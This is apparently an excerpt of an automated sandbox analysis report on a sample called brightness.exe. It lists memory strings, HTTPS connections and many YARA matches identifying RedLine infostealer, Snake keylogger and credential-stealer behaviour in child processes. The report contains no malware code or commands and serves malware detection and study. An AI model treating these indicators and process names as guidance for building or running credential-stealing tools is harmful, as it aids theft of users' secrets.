          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028BA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D40000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029ACC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CCB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035515000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035434000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003525C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003540D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353BF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035656000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.000000002190C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BC6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 
00000012.00000002.3078285306.0000000021A70000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: npratlsN.pif, 00000008.00000003.2441941457.0000000029CA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D1B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CD3000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AD2000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AA7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B1C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003539B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035237000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000354F1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003560E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353C6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035410000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.00000000218E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021CBE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A76000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028BA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D40000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029ACC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CCB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035515000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035434000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003525C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003540D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353BF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035656000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.000000002190C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BC6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 
00000012.00000002.3078285306.0000000021A70000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: npratlsN.pif, 00000008.00000003.2441941457.0000000029CA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D1B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CD3000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AD2000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AA7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B1C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003539B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035237000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000354F1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003560E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353C6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035410000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.00000000218E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021CBE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A76000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: npratlsN.pif, 00000012.00000002.3075519147.0000000020AF1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: npratlsN.pif, 00000012.00000002.3075519147.0000000020AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/DzY#
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028C5F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/Lz
          Source: npratlsN.pif, 0000000E.00000002.3083897007.00000000343EF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020AE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/P
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028C5A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343F9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknown HTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49778 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49805 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49818 version: TLS 1.2
          Source: Yara match File source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTR

          System Summary

          Source: 14.2.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.2.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 14.1.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.brightness.exe.217d67a8.10.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.2.npratlsN.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.1.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.brightness.exe.218133d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 11.2.Nsltarpn.PIF.210035b8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.brightness.exe.217d67a8.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
